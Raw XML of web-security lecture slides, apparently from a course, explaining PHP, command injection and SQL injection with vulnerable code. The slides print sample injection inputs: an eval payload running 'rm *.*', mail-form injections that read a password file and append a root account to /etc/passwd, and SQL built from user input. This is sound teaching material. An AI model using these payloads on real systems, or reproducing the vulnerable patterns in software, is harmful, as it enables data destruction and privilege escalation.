            <a:ext cx="985838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6" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B97BDB7-A914-BD44-8DA6-91B2471AB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495800"/>
            <a:ext cx="2362200" cy="1676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Database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434643" name="Line 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E08362C-BC5A-5241-8B8E-CB2BB2E81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0" y="3429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644" name="Line 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C74AB2E-CB19-514C-908C-4E798FB1B0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96400" y="3429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5859" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{572E328F-E6BE-924A-8E5E-6C9E05482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pic>
        <p:nvPicPr>
          <p:cNvPr id="35860" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902E7383-63A7-DA43-9D1A-FF6FF30C5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9" y="4724400"/>
            <a:ext cx="6762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</p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35861" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16DA0AC-88C4-B54C-893B-897133072FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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C76E4668-5A29-5945-8A11-1B52F30AC12F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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31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3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3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30" grpId="0"/>
      <p:bldP spid="1434632" grpId="0"/>
      <p:bldP spid="14346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0559-46EE-3E4C-88A6-2C8124A0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70686-2615-6E46-A24F-C2CF2F9CF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W3Schools SQL Injection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.w3schools.com/sql/sql_injection.asp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FuzzDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SQL Injection DB: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/all-attacks/all-attacks-unix.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OWASP XSS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attack examples: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.thegeekstuff.com/2012/02/xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>-attack-examples/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725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42B81CB-F603-CC41-A105-5DCD8D731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PHP: Hypertext Preprocessor </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368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6A5DDA2-08CD-AB49-A934-8AF12DEA3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Server scripting language with C-like syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can intermingle static HTML and code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/>
              <a:t>		&lt;input value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?php echo $myvalue; ?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Can embed variables in double-quote strings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/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user = “world”; echo “Hello $user!”;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800"/>
              <a:t>or	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user = “world”; echo “Hello” . $user . “!”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Form data in global arrays $_GET, $_POST, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90AB98AE-E29F-614A-9BC6-D64896269A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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ADB225C6-889A-1243-BC9C-CA00D2172554}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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92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2E8A95A8-562D-AE48-85F9-16946F70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0F042848-3FBD-9C47-AE23-C0FBAF35FD2B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21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1015DED-8F4F-D947-80C9-15869DC16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Command Injection in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37892" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{310BEA38-91B6-3645-B42D-26C59B36F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1" y="3200401"/>
            <a:ext cx="1876425" cy="296863"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21912"/>
              <a:gd name="adj2" fmla="val 123796"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="127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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supplied by the user!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9578A-A7D4-A442-895F-73C414ABB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178800" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Server-side PHP calculator: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rgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$in = $_GET[‘val'];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>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		eval('$op1 = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Good user calls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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/calc.php?val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="folHlink"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Bad user calls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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://victim.com/calc.php?val=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 ; system('rm *.*') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>calc.php executes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rgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> eval(‘$op1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5; system('rm *.*')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;'); </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="7030A0"/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D03AFC7-4DA6-454B-9CEF-5F0BB38C51CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="7704138" y="3132138"/>
            <a:ext cx="533400" cy="2803525"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21729"/>
              <a:gd name="adj2" fmla="val 51019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D2B795-2EAB-AA4C-84AD-1F8AF51D6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86200"/>
            <a:ext cx="151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URL-encoded</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1022771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D912A8F-D820-7B40-B036-9C84F91ACD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Command Injection in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389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BA9BA6F-9688-DA4C-B4D9-4F570D185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 PHP server-side code for sending email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US"/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Attacker posts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US"/>
            </a:b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>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>OR  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1A663D5-8C3D-614C-81C9-6FCECA093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226" y="2133601"/>
            <a:ext cx="7064375" cy="10191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r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>  system(“mail $email –s $subject &lt; /tmp/joinmynetwork”)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EB728DB8-D252-4942-9E06-64D8F4527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226" y="3733800"/>
            <a:ext cx="7064375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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.pl?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     email=hacker@hackerhome.net&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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B811904F-4B7D-6D47-95E4-19D0372F7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226" y="5181600"/>
            <a:ext cx="7064375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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.pl?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38919" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DFC1636-3040-1345-A4DA-EDCAFDF1E0F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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748A053C-CF5A-D143-A731-CC69D78E45A9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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678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752DAD9-A175-7049-B203-12E9B5220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SQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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2A2902E-F3C8-9948-9BF6-28E9AAB06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Widely used database query language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Fetch a set of records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT * FROM Person WHERE Username=‘Vitaly’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Add data to the table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT INTO Key (Username, Key) VALUES (‘Vitaly’, 3611BBFF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Modify data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE Keys SET Key=FA33452D WHERE PersonID=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Query syntax (mostly) independent of vendor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39940" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB7859D8-93A6-6E47-880B-BBFB02F120F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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4376520F-6F53-DE41-A561-01B5E3B13B39}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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883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8135165-D3FE-E54C-B7B3-62D82C261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 Query Generation Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25498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5D50339-C1F4-9343-90BB-F00F67927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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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>
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $selecteduser = $_GET['user'];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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $sql = "SELECT Username, Key FROM Key " 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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            "WHERE Username='$selecteduser'";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009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  $rs = $db-&gt;executeQuery($sql); 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What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘user’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>is a malicious string that changes the meaning of the query?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A47ED7-16F2-2248-976C-68EE62E1CCA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686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04A2D007-19BC-1C4E-B9DA-B7DDB2301367}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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id="{1805C9AA-5C4D-804E-913B-0ACB9EA78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027238"/>
            <a:ext cx="1295400" cy="792162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01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A4ADE0B-54F4-0342-8130-9B08D663F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 Login Prompt</a:t>
            </a:r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92EB4DFF-7BC6-3448-88DF-CDCE873C6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21" b="66945"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2579688" y="1828800"/>
            <a:ext cx="6259512" cy="414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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D33091-FB73-7A49-A3C4-F597FAAB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67CCED57-DAA1-B74E-A2D0-48E5765A3C73}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25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834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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53513DEC-DEF2-604B-A4DD-BFE898AC4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333" y="2286001"/>
            <a:ext cx="140134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Enter </a:t>
            </a:r>
          </a:p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Username </a:t>
            </a:r>
          </a:p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&amp; </a:t>
            </a:r>
          </a:p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B0FE724D-4BA0-364D-BE53-BE39EAECC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0401" y="228600"/>
            <a:ext cx="7942263" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>User Input Becomes Part of Query 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053B9C07-D9E0-6149-BEFC-07956F97A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701" y="2444750"/>
            <a:ext cx="1274763" cy="24066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Web</a:t>
            </a:r>
          </a:p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43013" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8BF36C-90A4-6E49-9995-829E34733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2444750"/>
            <a:ext cx="1395413" cy="24066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Web </a:t>
            </a:r>
          </a:p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browser</a:t>
            </a:r>
          </a:p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(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43014" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1389CC46-7C65-9B49-B442-8FD92A736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7901" y="2444750"/>
            <a:ext cx="1274763" cy="24066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43015" name="Line 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29DDF291-D191-2048-8579-569A89A21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764" y="3886200"/>
            <a:ext cx="1298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Line 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84AC8A7-35D4-6D4F-9670-84A2FAF5C4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48100" y="4418013"/>
            <a:ext cx="1181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Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4CC9CB9-760C-9346-A6B0-19F2320F5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334" y="2286001"/>
            <a:ext cx="204254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SELECT passwd </a:t>
            </a:r>
          </a:p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FROM USERS</a:t>
            </a:r>
          </a:p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WHERE uname </a:t>
            </a:r>
          </a:p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IS ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43018" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40182D93-7CC5-FB43-BF28-15701DEA85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6" y="3886200"/>
            <a:ext cx="2212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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABD1A9AB-A2FB-3141-81EB-B15F028994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5563" y="4381500"/>
            <a:ext cx="2119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Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{623B82A0-AE8E-C840-AEFA-81CE6CD1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4E7C4CED-957C-634B-A729-A68D2CC8C5D1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1200">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26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087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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3203ED37-7928-9142-B369-625E2DEE5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333" y="2286001"/>
            <a:ext cx="140134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Enter </a:t>
            </a:r>
          </a:p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Username </a:t>
            </a:r>
          </a:p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&amp; </a:t>
            </a:r>
          </a:p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A729AB3-010D-AA46-A101-588599528E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Normal Login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5141ACC-2BEA-2B49-A9F8-F467CF8DC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701" y="2444750"/>
            <a:ext cx="1274763" cy="24066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Web</a:t>
            </a:r>
          </a:p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5CED3D27-AFF1-0442-922C-6BA0FF11A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2444750"/>
            <a:ext cx="1395413" cy="24066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Web </a:t>
            </a:r>
          </a:p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browser</a:t>
